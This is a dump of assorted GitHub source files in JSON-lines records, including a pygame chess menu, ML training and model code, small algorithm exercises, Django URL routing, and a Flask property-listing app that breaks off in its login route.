Game\"]\n\n for i in range(4):\n button_rect = p.Rect(self.button_x, self.button_y + i * (self.button_height + self.button_padding),\n self.button_width, self.button_height)\n\n if i % 2:\n button_color = self.BLACK\n text_color = self.WHITE\n else:\n button_color = self.WHITE\n text_color = self.BLACK\n\n if 
button_rect.collidepoint(p.mouse.get_pos()):\n if i % 2:\n button_color = self.HOVER_BLACK\n else:\n button_color = self.HOVER_WHITE\n\n p.draw.rect(self.screen, button_color, button_rect, 0)\n p.draw.rect(self.screen, self.BLACK, button_rect, 2)\n\n button_image_x = self.button_x + 10\n button_image_y = self.button_y + i * (self.button_height + self.button_padding) + (\n self.button_height - self.btn_images[i].get_height()) // 2\n self.screen.blit(self.btn_images[i], (button_image_x, button_image_y))\n\n label = self.font3.render(button_texts[i], True, text_color)\n label_x = self.button_x + self.button_width // 2 - label.get_width() // 2\n label_y = self.button_y + i * (self.button_height + self.button_padding) + (\n self.button_height - label.get_height()) // 2\n self.screen.blit(label, (label_x, label_y))\n\n def handle_button_click(self, event):\n button_index = -1\n\n for i in range(4):\n\n button_rect = p.Rect(self.button_x, self.button_y + i * (self.button_height + self.button_padding),\n self.button_width, self.button_height)\n\n if button_rect.collidepoint(event.pos):\n button_index = i\n break\n\n if button_index != -1:\n\n if button_index == 0:\n PVC().run()\n elif button_index == 1:\n game()\n elif button_index == 2:\n RankingWindow().run()\n elif button_index == 3:\n PVC().handle_load_button_click()\n\n self.running = False\n p.quit()\n\n def draw(self):\n\n self.screen.fill(self.WHITE)\n self.draw_buttons()\n\n label1 = self.font1.render(\"CHESS.ME.COM\", True, self.BLACK)\n self.screen.blit(label1, (self.label1_x, self.label1_y))\n\n label2 = self.font2.render(\"CHESS.COM SUCKS, WE ARE BETTER\", True, self.BLACK)\n self.screen.blit(label2, (self.label2_x, self.label2_y))\n\n p.display.flip()\n\n def run(self):\n\n while self.running:\n\n for event in p.event.get():\n\n if event.type == p.QUIT:\n self.running = False\n p.quit()\n\n elif event.type == p.MOUSEBUTTONUP:\n self.handle_button_click(event)\n self.running = False\n\n if self.running:\n self.draw()\n self.clock.tick(MAX_FRAMERATE)\n\n p.quit()\n","repo_name":"AntuanW/ChessApp","sub_path":"app/GUI/ModeWindow/ModeWindow.py","file_name":"ModeWindow.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19770968299","text":"#!/usr/bin/env python3\n\n# =============================================================================\n# Example file for creating a coronagraphic/non-coronagraphic PSF\n# =============================================================================\n\n# Required libraries\nimport proper # library for propagation of wavefront\nimport matplotlib.pyplot as plt # for plotting simulated PSFs\nimport numpy as np\nfrom astropy.io import fits # to read and write fits files\n\nfrom simulation_config import *\t# Loads default configuration for simulation \nfrom heeps import * # loads all HEEPS scripts required for simuation\n\n\"\"\"\nDefault simulation cofiguration defined in \"simulation_config.py\" can be overridden here\n\"\"\"\nwavelength = 3.80*10**-6\ncharge = 2 # charge is modified here\n\n\n# =============================================================================\n# ELT Pupil Plane\n# =============================================================================\n\n(npupil, wfo) = pupil(diam, gridsize, spiders_width, spiders_angle, pixelsize, \n r_obstr, wavelength, pupil_file=pupil_file, missing_segments_number=0, \n Debug=True, Debug_print=Debug_print, prefix=prefix) \n\n# 
=============================================================================\n# Wavefront abberations\n# =============================================================================\n\nwavefront_abberations(wfo, npupil, atm_screen, NCPA,Island_Piston,TILT=TILT, \n Debug='False', Debug_print='False', prefix='test') \n\n# =============================================================================\n# Coronagraph selection -- Vortex Classical (VC) / RAVC / APP --\n# =============================================================================\n\"\"\"\n1. By changing the \"coronagraph_type\" to \"VC/RAVC/APP\" coronagraphs can be selcted. \n2. If the input is \"None\" a non-coronagraphic PSF with lyot-stop is generated\n3. If the input is anything except above keywords a normal PSF is generated\n\"\"\"\n\ncoronagraph_type = 'RAC'\n\ncoronagraphs(wfo, r_obstr,npupil, phase_apodizer_file,amplitude_apodizer_file,\n apodizer_misalignment,charge,f_lens,diam,LS_amplitude_apodizer_file,LS_misalignment,\n LS,LS_parameters,spiders_angle, LS_phase_apodizer_file, Debug_print,pixelsize, \n Debug,coronagraph_type= coronagraph_type)\n\n# =============================================================================\n# Detector plane\n# =============================================================================\npsf = detector(wfo,f_lens,nd,coronagraph_type,prefix,Debug=True)\t\n\n\nplt.figure()\nplt.imshow(np.sqrt(psf))\nplt.colorbar()\n\nplt.show()\n\n","repo_name":"ppathak8/heeps_old_version","sub_path":"example_coronagraph_psf.py","file_name":"example_coronagraph_psf.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39355720519","text":"\nfrom pearl.envs import ENVS\nfrom pearl.envs.env import NormalizedBoxEnv\nfrom pearl.policy import TanhGaussianPolicy\nfrom pearl.network import FlattenMLP, MLPEncoder # , RecurrentEncoder\nfrom pearl.sac import PEARLSoftActorCritic\nfrom pearl.agent import PEARLAgent\nfrom pearl.launcher import setup_logger\nfrom pearl.configs.default import default_config\n\n\nfrom timeseries.config import Config\nfrom timeseries.model import TSModel\n# from timeseries.data_process import DataScheduler\nfrom timeseries.data_process_v2_0 import DataScheduler\nfrom timeseries.rl import MyEnv\n\nimport os\nimport pathlib\nimport numpy as np\n\n\ndef deep_update_dict(fr, to):\n ''' update dict of dicts with new values '''\n # assume dicts have same keys\n for k, v in fr.items():\n if type(v) is dict:\n deep_update_dict(v, to[k])\n else:\n to[k] = v\n return to\n\n\ndef main():\n ts_configs = Config()\n # get data for all assets and dates\n ds = DataScheduler(ts_configs, data_type='kr_stock')\n\n model = TSModel(ts_configs)\n # ts_configs.f_name = 'ts_model_test_info1.1_mtl' #: ds.set_idx(6000)\n # ts_configs.f_name = 'ts_model_test_info1.2_mtl' #: not ds.set_idx()\n # ts_configs.f_name = 'ts_model_test_info1.3_mtl' #: bbticker test with ds.set_idx(6000)\n # ts_configs.f_name = 'ts_model_test_info_mtl_us_1_1' #: us 2500\n # ts_configs.f_name = 'ts_model_test_info_mtl_us_1_2' #: us every\n ts_configs.f_name = 'kr_mtl_dg_dynamic_1_0_mlarge4' #: kr every\n\n if os.path.exists(ts_configs.f_name + '.pkl'):\n model.load_model(ts_configs.f_name)\n\n ds.set_idx(4000)\n ds.test_end_idx = ds.base_idx + 1000\n ii = 0\n while not ds.done:\n if ii % 1 == 0:\n # if ii == 0:\n ds.train(model,\n train_steps=1,\n eval_steps=10,\n save_steps=200,\n early_stopping_count=10,\n 
model_name=ts_configs.f_name,\n plot_train=False)\n\n model.save_model(\"./out/{}/{}/{}\".format(ts_configs.f_name, ds.base_idx, ts_configs.f_name))\n ds.test(model,\n each_plot=False,\n out_dir=os.path.join(ds.data_out_path, ts_configs.f_name, 'test_linear_train'),\n file_nm='test_{}.png'.format(ii),\n ylog=False)\n\n # ds.finetune(model, train_steps=10)\n\n ds.next()\n ii += 1\n\n # env = MyEnv(model, data_scheduler=ds, configs=ts_configs, trading_costs=0.001)\n\n env_name = 'korea-stock'\n variant = default_config\n variant['env_name'] = env_name\n #\n # with open(\"./configs/{}.json\".format(env_name)) as f:\n # exp_params = json.load(f)\n # variant = deep_update_dict(exp_params, variant)\n\n env = NormalizedBoxEnv(ENVS[variant['env_name']](model, ds, ts_configs, **variant['env_params']))\n tasks = env.get_all_task_idx()\n obs_dim = int(np.prod(env.observation_space.shape))\n action_dim = int(np.prod(env.action_space.shape))\n\n # instantiate networks\n latent_dim = variant['latent_size']\n context_encoder = latent_dim * 2 if variant['algo_params']['use_information_bottleneck'] else latent_dim\n reward_dim = 1\n net_size = variant['net_size']\n recurrent = variant['algo_params']['recurrent']\n # encoder_model = RecurrentEncoder if recurrent else MlpEncoder\n encoder_model = MLPEncoder\n\n context_encoder = encoder_model(\n hidden_sizes=[200, 200, 200],\n input_size=obs_dim + action_dim + reward_dim,\n output_size=context_encoder,\n )\n qf1 = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + action_dim + latent_dim,\n output_size=1,\n )\n qf2 = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + action_dim + latent_dim,\n output_size=1,\n )\n vf = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + latent_dim,\n output_size=1,\n )\n target_vf = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + latent_dim,\n output_size=1,\n )\n policy = TanhGaussianPolicy(\n hidden_sizes=[net_size, net_size, net_size],\n obs_dim=obs_dim + latent_dim,\n latent_dim=latent_dim,\n action_dim=action_dim,\n )\n agent = PEARLAgent(\n latent_dim,\n context_encoder,\n policy,\n **variant['algo_params']\n )\n algorithm = PEARLSoftActorCritic(\n env=env,\n train_tasks=list(tasks[:variant['env_params']['n_tasks_dict']['train']]),\n eval_tasks=list(tasks[-variant['env_params']['n_tasks_dict']['eval']:]),\n nets=[agent, qf1, qf2, vf, target_vf],\n latent_dim=latent_dim,\n **variant['algo_params']\n )\n\n def example():\n train_tasks = list(tasks[:variant['env_params']['n_tasks_dict']['train']])\n meta_batch = 64\n indices = np.random.choice(train_tasks, meta_batch)\n\n\n # debugging triggers a lot of printing and logs to a debug directory\n DEBUG = variant['util_params']['debug']\n os.environ['DEBUG'] = str(int(DEBUG))\n\n # create logging directory\n # TODO support Docker\n exp_id = 'debug' if DEBUG else None\n experiment_log_dir = setup_logger(variant['env_name'], variant=variant, exp_id=exp_id, base_log_dir=variant['util_params']['base_log_dir'])\n\n # optionally save eval trajectories as pkl files\n if variant['algo_params']['dump_eval_paths']:\n pickle_dir = experiment_log_dir + '/eval_trajectories'\n pathlib.Path(pickle_dir).mkdir(parents=True, exist_ok=True)\n\n # run the algorithm\n 
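# train() comes from pearl.sac; it presumably alternates collecting rollouts on the\n # train tasks with SAC updates conditioned on the latent context inferred by\n # context_encoder -- the exact loop lives in PEARLSoftActorCritic and is only assumed here\n 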
algorithm.train()\n","repo_name":"ainklain/mynlp","sub_path":"pearl/main_pearl.py","file_name":"main_pearl.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9009999836","text":"\"\"\"bbook_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\nhttps://docs.djangoproject.com/en/2.0/topics/http/urls/\n\nThe `djx.urls:load_urls` utility is used to automatically include all\nurl patterns from `urls.py` modules in project subdirectories.\n\nFor example, `bbook_backend.api.urls:urlpatterns` will be routed\nunder the \"/api\" prefix.\n\"\"\"\n\nfrom django.conf.urls import (\n include,\n url,\n)\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom inspect import isclass\nfrom dynamic_rest.routers import DynamicRouter\nfrom bbook_backend.api import views\nfrom rest_framework.authtoken import views as authtoken_views\n\n\nurlpatterns = []\nif 'django.contrib.admin' in settings.INSTALLED_APPS:\n urlpatterns.append(\n url(r'^admin/', admin.site.urls)\n )\n\n\nrouter = DynamicRouter()\n\n\ndef register_views(views):\n for name in dir(views):\n view = getattr(views, name)\n if (\n isclass(view) and\n getattr(view, 'serializer_class', None) and\n getattr(view, 'IS_CANONICAL', True)\n ):\n router.register_resource(view, namespace='v0')\n\n\nregister_views(views)\n\n\nrouter.register(r'v0/story_recordings', views.StoryRecordingViewSet)\n\n\nurlpatterns.extend([\n url(r'^', include(router.urls)),\n url(r'^api-token-auth/', authtoken_views.obtain_auth_token),\n url(r'^rest-auth/', include('rest_auth.urls')),\n url(r'^rest-auth/registration/', include('rest_auth.registration.urls'))\n])\n","repo_name":"rgangopadhya/b-book-backend","sub_path":"bbook_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34147030392","text":"import copy\nimport math\n\nimport torch\nimport torch.nn.functional as F\nfrom detectron2.layers import DepthwiseSeparableConv2d\nfrom timm.models.layers import DropPath\nfrom torch import Tensor, nn\nfrom torch.functional import Tensor\nfrom torch.nn import MultiheadAttention\n\n\nclass GroupWiseLinear(nn.Module):\n # could be changed to:\n # output = torch.einsum('ijk,zjk->ij', x, self.W)\n # or output = torch.einsum('ijk,jk->ij', x, self.W[0])\n def __init__(self, num_class, hidden_dim, bias=True):\n super().__init__()\n self.num_class = num_class\n self.hidden_dim = hidden_dim\n self.bias = bias\n\n self.W = nn.Parameter(torch.Tensor(1, num_class, hidden_dim))\n if bias:\n self.b = nn.Parameter(torch.Tensor(1, num_class))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1.0 / math.sqrt(self.W.size(2))\n for i in range(self.num_class):\n self.W[0][i].data.uniform_(-stdv, stdv)\n if self.bias:\n for i in range(self.num_class):\n self.b[0][i].data.uniform_(-stdv, stdv)\n\n def forward(self, x):\n # x: B,K,d\n x = (self.W * x).sum(-1)\n if self.bias:\n x = x + self.b\n return x\n\n\nclass MultiLabelHead(nn.Module):\n def __init__(\n self,\n num_classes,\n d_encoder,\n hidden_dim,\n n_heads,\n d_ff,\n dropout,\n share_embedding,\n downsample=None,\n mlp=True,\n droppath=0,\n ):\n super().__init__()\n self.share_embedding = share_embedding\n self.mlp = mlp\n self.block = Block(hidden_dim, n_heads, d_ff, dropout, droppath)\n self.norm = nn.LayerNorm(hidden_dim)\n 
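# GroupWiseLinear (defined above) learns one weight vector per class and scores\n # class k as (W[0][k] * x[:, k]).sum(-1) -- a per-class classifier head rather\n # than a single shared nn.Linear over all class embeddings\n 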
self.num_classes = num_classes\n self.fc = GroupWiseLinear(num_classes, hidden_dim)\n\n if not share_embedding:\n self.cls_emb = nn.Parameter(torch.randn(1, num_classes, hidden_dim))\n from torch.nn.init import trunc_normal_\n\n trunc_normal_(self.cls_emb, std=0.02)\n self.scale = hidden_dim ** -0.5\n\n self.proj_dec = nn.Linear(d_encoder, hidden_dim)\n self.downsample = downsample\n if downsample:\n self.pooling = nn.AdaptiveAvgPool2d(downsample)\n\n def forward(self, x):\n if self.share_embedding:\n x, cls_emb = x\n cls_emb = cls_emb.unsqueeze(0)\n else:\n cls_emb = self.cls_emb\n if self.downsample:\n x = self.pooling(x)\n\n B, C = x.size()[:2]\n x = x.view(B, C, -1).permute(0, 2, 1)\n x = self.proj_dec(x)\n\n cls_emb = cls_emb.expand(x.size(0), -1, -1)\n x = torch.cat((x, cls_emb), 1)\n x = self.block(x)\n x = self.norm(x)\n cls_emb = x[:, -self.num_classes :]\n img_pred = self.fc(cls_emb)\n\n return img_pred\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim, dropout, out_dim=None):\n super().__init__()\n self.fc1 = nn.Linear(dim, hidden_dim)\n self.act = nn.GELU()\n if out_dim is None:\n out_dim = dim\n self.fc2 = nn.Linear(hidden_dim, out_dim)\n self.drop = nn.Dropout(dropout)\n\n @property\n def unwrapped(self):\n return self\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads, dropout):\n super().__init__()\n self.heads = heads\n head_dim = dim // heads\n self.scale = head_dim ** -0.5\n self.attn = None\n\n self.qkv = nn.Linear(dim, dim * 3)\n self.attn_drop = nn.Dropout(dropout)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(dropout)\n # from .mask_transformer_head import MatmalFlopsCounter\n # self.matmul = MatmalFlopsCounter()\n\n @property\n def unwrapped(self):\n return self\n\n def forward(self, x, mask=None):\n B, N, C = x.shape\n qkv = (\n self.qkv(x)\n .reshape(B, N, 3, self.heads, C // self.heads)\n .permute(2, 0, 3, 1, 4)\n )\n q, k, v = (\n qkv[0],\n qkv[1],\n qkv[2],\n )\n\n attn = q @ k.transpose(-2, -1) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n\n return x, attn\n\n\nclass Block(nn.Module):\n def __init__(self, dim, heads, mlp_dim, dropout, drop_path):\n super().__init__()\n self.norm1 = nn.LayerNorm(dim)\n self.norm2 = nn.LayerNorm(dim)\n self.attn = Attention(dim, heads, dropout)\n self.mlp = FeedForward(dim, mlp_dim, dropout)\n self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()\n\n def forward(self, x, mask=None, return_attention=False):\n y, attn = self.attn(self.norm1(x), mask)\n if return_attention:\n return attn\n x = x + self.drop_path(y)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass DecoderLinear(nn.Module):\n def __init__(self, n_cls, patch_size, d_encoder):\n super().__init__()\n\n self.d_encoder = d_encoder\n self.patch_size = patch_size\n self.n_cls = n_cls\n\n self.head = nn.Linear(self.d_encoder, n_cls)\n self.apply(init_weights)\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return set()\n\n def forward(self, x, im_size):\n H, W = im_size\n GS = H // self.patch_size\n x = self.head(x)\n B, HW, C = x.size()\n x = x.view(B, GS, HW // GS, C).permute(0, 3, 1, 2)\n # x = rearrange(x, \"b (h w) c -> b c h w\", h=GS)\n\n return x\n\n\nclass Mlp(nn.Module):\n \"\"\"MLP as used in Vision Transformer, 
MLP-Mixer and related networks\"\"\"\n\n def __init__(\n self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU\n ):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.fc2(x)\n return x\n","repo_name":"openseg-group/RankSeg","sub_path":"mask2former/mask2former/modeling/multilabel_head.py","file_name":"multilabel_head.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"40"}
{"seq_id":"70377914040","text":"'''\nThe number card game: from several number cards, draw the single card bearing the highest number.\n1. The numbered cards are laid out in an N*M grid (N is the row count, M the column count).\n2. First, choose the row that contains the card you want to draw.\n3. Then, from the cards in the chosen row, you must draw the card with the lowest number.\n4. So when picking the row in the first place, plan ahead: knowing the lowest card of that\nrow will be drawn, choose the row whose minimum is the highest possible card.\n'''\n\nn, m = map(int, input().split())\nresult = 0\n\nfor i in range(n):\n row = list(map(int, input().split()))\n minNum = min(row)\n result = max(result, minNum)\n\nprint(result)","repo_name":"ssum-dal/CodingTest","sub_path":"이코테/그리디/숫자카드게임.py","file_name":"숫자카드게임.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"73948427959","text":"# coding = utf-8\n\ndef get_target():\n\n f = open(r\"C:\\Users\\Yong Cao\\Downloads\\Belsom_Rappsilber_sulfoSDA.csv\", 'r').readlines()\n\n b =open(\"report.csv\", 'w')\n\n spec_dic = {}\n pep_dic = {}\n for line in f[1:]:\n linelist = line.split(\",\")\n raw = linelist[1]\n xlink = linelist[8:12]\n print(linelist[8:12])\n if raw not in spec_dic:\n spec_dic[raw] = 1\n else:\n spec_dic[raw] += 1\n \n if raw not in pep_dic:\n pep_dic[raw] = [xlink]\n else:\n if xlink not in pep_dic[raw]:\n pep_dic[raw].append(xlink)\n \n print(spec_dic)\n\n raw_list = sorted(list(spec_dic.keys()), key = lambda x: int(x.split('_')[-1]))\n\n for raw in raw_list:\n b.write(\",\".join([raw, str(len(pep_dic[raw])), str(spec_dic[raw])])+\"\\n\")\n # print(raw, len(pep_dic[raw]))\n\n a = sorted(pep_dic.items(), key = lambda x:len(x[1]), reverse = True)\n target = [x[0] for x in a[:10]]\n return target","repo_name":"daheitu/pFind_data_post_analysis.github.io","sub_path":"FTP/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"5573046085","text":"#Very similar to the min no. of coins reqd. to make a given change\n#Also greedy strategy works\n#https://www.interviewbit.com/problems/sum-of-fibonacci-numbers/\nimport bisect\nclass Solution:\n # @param A : integer\n # @return an integer\n def generateFibSeries(self,n):\n series=[1,1]\n fib_number=1\n i=2\n while fib_number<=n:\n fib_number=series[i-1]+series[i-2]\n series.append(fib_number)\n i+=1\n \n return series\n \n def giveNumberLessThanOrEqualsN(self,a,n):\n idx=bisect.bisect_left(a,n)\n numLess=a[idx]\n if(numLess>n):\n numLess=a[idx-1]\n return numLess \n \n def fibsum(self, A):\n fib_numbers=self.generateFibSeries(A)\n number=A\n count=0\n while number:\n count+=1\n numLess=self.giveNumberLessThanOrEqualsN(fib_numbers,number)\n number-=numLess\n \n \n \n return count\n","repo_name":"thecodearrow/InterviewBit-Python-Solutions","sub_path":"Greedy/Sum of fibbonacci numbers.py","file_name":"Sum of fibbonacci numbers.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"}
{"seq_id":"21691980688","text":"result = []\nfor i in range(7):\n data = int(input())\n if data%2 != 0:\n result.append(data)\n\nif not result : # empty list -> True\n print(-1)\nelse:\n print(sum(result))\n print(min(result))","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/0.기초/홀수.py","file_name":"홀수.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"40213997147","text":"# Python program to find strongly connected components, bridges and articulation points in a graph\n\nfrom collections import defaultdict\n\n\nclass TarzanGraph:\n\n def __init__(self, vertices):\n self.V = vertices \n self.graph = defaultdict(list) \n self.Time = 0\n\n # function to add an edge to graph\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n # implementation of SCC, bridges and articulation points.\n def SCC(self):\n self.timer = 0\n disc = [float(\"Inf\")] * (self.V) # discovery timer as per dfs traversal\n low = [float(\"Inf\")] * (self.V) # lowest possible discovery from any path\n\n stackMember = [False] * (self.V)\n st = []\n bridges = []\n ap = set()\n \n def dfs(node, root_node=False):\n disc[node] = self.timer\n low[node] = self.timer\n self.timer += 1\n \n stackMember[node] = True\n st.append(node)\n children = 0\n\n for child_node in self.graph[node]:\n if child_node == node:\n continue\n if disc[child_node] == float(\"Inf\"):\n dfs(child_node)\n low[node] = min(low[node], low[child_node])\n \n children += 1\n # case-1 for ap\n if root_node and children > 1:\n if node not in ap:\n ap.add(node)\n # case-2 for ap\n if not root_node and low[child_node] >= disc[node]:\n if node not in ap:\n ap.add(node)\n # for bridges\n if (low[child_node] > disc[node]):\n bridges.append((child_node, node))\n\n elif stackMember[child_node]:\n low[node] = min(low[node], disc[child_node])\n\n # head node found, pop the stack and print an SCC\n w = -1 # To store stack extracted vertices\n if low[node] == disc[node]:\n print(\"scc: >>\", end=\" \")\n while w != node:\n w = st.pop()\n print(w, end=\" \")\n stackMember[w] = False\n\n print()\n \n for i in range(self.V):\n if disc[i] == float(\"Inf\"):\n dfs(i, root_node=True)\n print(\"Bridges: \", bridges)\n print(\"AP: \", ap)\n\n\ng1 = TarzanGraph(5)\ng1.addEdge(1, 0)\ng1.addEdge(0, 2)\ng1.addEdge(2, 1)\ng1.addEdge(0, 3)\ng1.addEdge(3, 4)\n\nprint(\"Strongly connected Components in first graph \")\ng1.SCC()\n\ng2 = TarzanGraph(4)\ng2.addEdge(0, 1)\n
g2.addEdge(1, 2)\ng2.addEdge(2, 3)\nprint(\"Strongly connected Components in second graph \")\ng2.SCC()\n\n\ng1 = TarzanGraph(5)\ng1.addEdge(1, 0)\ng1.addEdge(0, 2)\ng1.addEdge(2, 1)\ng1.addEdge(0, 3)\ng1.addEdge(3, 4)\nprint(\"Strongly connected Components in first graph \")\ng1.SCC()\n\ng2 = TarzanGraph(4)\ng2.addEdge(0, 1)\ng2.addEdge(1, 2)\ng2.addEdge(2, 3)\nprint(\"\\nStrongly connected Components in second graph \")\ng2.SCC()\n\n\ng3 = TarzanGraph(7)\ng3.addEdge(0, 1)\ng3.addEdge(1, 2)\ng3.addEdge(2, 0)\ng3.addEdge(1, 3)\ng3.addEdge(1, 4)\ng3.addEdge(1, 6)\ng3.addEdge(3, 5)\ng3.addEdge(4, 5)\nprint(\"\\nStrongly connected Components in third graph \")\ng3.SCC()\n\ng4 = TarzanGraph(11)\ng4.addEdge(0, 1)\ng4.addEdge(0, 3)\ng4.addEdge(1, 2)\ng4.addEdge(1, 4)\ng4.addEdge(2, 0)\ng4.addEdge(2, 6)\ng4.addEdge(3, 2)\ng4.addEdge(4, 5)\ng4.addEdge(4, 6)\ng4.addEdge(5, 6)\ng4.addEdge(5, 7)\ng4.addEdge(5, 8)\ng4.addEdge(5, 9)\ng4.addEdge(6, 4)\ng4.addEdge(7, 9)\ng4.addEdge(8, 9)\ng4.addEdge(9, 8)\nprint(\"\\nStrongly connected Components in fourth graph \")\ng4.SCC()\n\n\ng5 = TarzanGraph(5)\ng5.addEdge(0, 1)\ng5.addEdge(1, 2)\ng5.addEdge(2, 3)\ng5.addEdge(2, 4)\ng5.addEdge(3, 0)\ng5.addEdge(4, 2)\nprint(\"\\nStrongly connected Components in fifth graph \")\ng5.SCC()\n","repo_name":"vKrypto/practice-dsa","sub_path":"data_structures/graph/tarjan.py","file_name":"tarjan.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"41531295596","text":"import nodes.handler\nimport virtuosoWrapper.virtuosoWrapper as rdfWrapper\nfrom Dataset.dataset import dataset\n\nclass label_set(dataset):\n\n    def insert_in_annetto(self):\n        res=rdfWrapper.new_named_individual(self.name)\n        if res==0:\n            rdfWrapper.new_type(self.name, self.type)\n\n    def __init__(self,node):\n        super(label_set, self).__init__(node)\n        self.count=0\n        self.name=node.get_name()+\"_label_set\"\n        self.type=\"Labelset\"\n        for elem in self.node.get_output():\n            for num in elem.dim:\n                # We want the number of labels, so we only need the last dimension size;\n                # we iterate and keep the last positive one.\n                if int(num.size) > 0:\n                    self.count=int(num.size)\n                    print(\"LOGGING:Found size\", self.count)","repo_name":"JoHNNyB92/thesis_code","sub_path":"thesis/tensorflow_parse_files/Dataset/label_set.py","file_name":"label_set.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"23069742293","text":"import os\nfrom flask import (\n Flask, flash, render_template, jsonify,\n redirect, request, session, url_for, abort)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nfrom werkzeug.security import generate_password_hash, check_password_hash\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\n\n'''\nIn development the environment variables are saved in env.py\nand in production the environment variables are\nsaved in the Config Vars in Heroku\n'''\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\n\n# SET AN INSTANCE OF PyMongo\nmongo = PyMongo(app)\n\n\ndef string_to_array(str_to_split):\n \"\"\"\n FUNCTION TO CONVERT NEWLINE-SEPARATED\n STRINGS TO ARRAYS\n \"\"\"\n array = str_to_split.split(\"\\n\")\n return array\n\n\ndef admin():\n \"\"\"\n 
Check that the user in session is the admin user\n \"\"\"\n return session['user'] == 'admin'\n\n\n@app.route(\"/get_properties\")\ndef get_properties():\n \"\"\"\n READ PROPERTIES FUNCTIONALITY\n \"\"\"\n properties = list(mongo.db.properties.find())\n return render_template(\"properties.html\", properties=properties)\n\n\n@app.route(\"/update_property_feature/\", methods=[\"POST\"])\ndef update_property_feature(property_id):\n \"\"\"\n Update property featured\n \"\"\"\n try:\n featured = request.json['featured']\n mongo.db.properties.update_one(\n {\"_id\": ObjectId(property_id)}, {\"$set\": {\"featured\": featured}})\n return \"\", 204\n except Exception as e:\n return \"Bad Request\", 400\n\n\n@app.route('/')\n@app.route(\"/get_featured_properties\")\ndef get_featured_properties():\n \"\"\"\n READ FEATURED PROPERTY FUNCTIONALITY\n \"\"\"\n featured_properties = list(mongo.db.properties.find({'featured': True}))\n return render_template(\"index.html\", properties=featured_properties)\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"\n SIGN UP / REGISTER FUNCTIONALITY\n \"\"\"\n if is_authenticated():\n flash(\"Please logout first to execute this operation.\")\n return redirect(url_for(\"get_properties\"))\n\n if request.method == \"POST\":\n # then check if the username exists within the database\n existing_user = mongo.db.users.find_one(\n # check if Mongo username matches input for username in form\n {\"username\": request.form.get(\"username\").lower()})\n\n # if match with existing user then give message\n if existing_user:\n flash(\"Oh no, this username already exists...\")\n # take the user back to the sign up page\n return redirect(url_for(\"register\"))\n\n # if no user is found, then insert data in the dictionary\n register = {\n \"username\": request.form.get(\"username\").lower(),\n \"email\": request.form.get(\"email\"),\n \"password\": generate_password_hash(request.form.get(\"password\")),\n \"bookmarks\": []\n }\n mongo.db.users.insert_one(register)\n\n # put the new user into 'session' cookie\n session[\"user\"] = request.form.get(\"username\").lower()\n # to replace with modal\n flash(\"Registration successful! You can now view or share properties!\")\n return redirect(url_for(\"profile\"))\n\n return render_template(\"register.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"\n LOG IN FUNCTIONALITY\n \"\"\"\n if is_authenticated():\n return redirect(url_for(\"get_properties\"))\n\n 